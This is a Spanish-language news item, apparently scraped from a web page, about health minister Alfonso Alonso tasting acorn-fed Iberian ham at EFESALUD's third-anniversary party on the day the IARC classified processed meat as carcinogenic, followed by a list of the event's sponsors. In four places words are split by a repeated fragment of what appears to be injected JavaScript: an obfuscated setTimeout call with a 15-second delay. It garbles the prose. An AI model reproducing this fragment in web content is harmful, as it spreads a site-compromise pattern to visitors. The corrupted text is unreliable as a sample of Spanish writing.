El ministro de sanidad apoya el jamón Ibérico de bellota el mismo día en que la OMS lo declara cancerígeno

EFESALUD CUMPLE 3 AÑOS Y MIL NÚMEROS

IMG_4574
El Ministro de Sanidad, Servicios Sociales e Igualdad, Alfonso Alonso, junto al Presidente de la Agencia EFE, José Antonio Vera.

El ministro de Sanidad, servicios sociales e igualdad, Alfonso Alonso, posaba anoche junto al Presidente de la Selección Profesional de Cortadores de jamón, Julio Márquez, degustandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando los jamones ibéricos de bellota que la empresa Cerdos Extremeños S.L. había aportado para el tercer aniversario de EFE SALUD. El ministro daba de esta manera su apoyo al sector horas después de que la OMS hubiera alistado a las carnes procesadas (“frankfurters -perros calientes/hot dogs/salchichas-, jamón, salchichas, carne en conserva -corned beef-, y cecina o carne seca, así como carne en lata, y las preparaciones y salsas a base de carne”) en la lista de productos cancerígenos, tal y como comunicó el IARC ayer por la mañana mediante una nota de prensa: <<La carne procesada se clasificó como carcinógena para los humanos (Grupo1), basada en evidencia suficiente en humanos de que el consumo de carne procesada causa cáncer colorrectal>>.

IMG_4593
El Ministro de Sanidad, Servicios Sociales e Igualdad, Alfonso Alonso, junto al Presidente SPCJ Cortadores de Jamón, Julio Márquez.

El ministro, posó para las fotos degustandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando el jamón y apoyandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando su consumo junto al Presidente de la Agencia EFE, José Antonio Vera, quien le acompañó durante su recorrido por la segunda planta del Edificio Génesis, actual sede de la Agencia EFE en Madrid.

El ministro acudió a las instalaciones de la Agencia EFE para celebrar lo que finalmente resultó una fiesta de cumpleaños entre amigos y profesionales del mundo de la salud. Médicos, farmacéuticos, periodistas especializados y blogueros asistieron a la celebración de tres años de trabajo intenso por parte de la filial EFESALUD.

Fhotocall
La Presidenta de UGE España, Mamen Villalba, junto al Presidente de SPCJ Cortadores de Jamón, Julio Márquez.

El cóctel estuvo a cargo del departamento de EFE EVENTOS con el que, una vez más, colaboró para la organización el equipo de trabajo de UGE Unión Gastronómica Española.   Al acto asistió la Presidenta y Fundadora de UGE España, Mamen Villalba.

Para esta ocasión, los clientes asociados a UGE que participaron, volvieron a demostrar su tallaje profesional y la calidad tanto en productos como en servicio. De esta manera, brillaron con luz propia SPCJ Cortadores de Jamón, los jamones de la empresa Cerdos Extremeños S.L., Quesos el Bosqueño, Artigot Catering, D.O. Rioja y Ginebra Mom, comercializada por las Bodegas González Byass.

 

IMG_4577
Detalle de la presentación de Quesos el Bosqueño
IMG_4576
Detalle de una de las bandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andejas de Artigot Catering
IMG_4612
Barra degustación de la Ginebra Premium MOM (Bodegas González Byass)
IMG_4627
Barman de MOM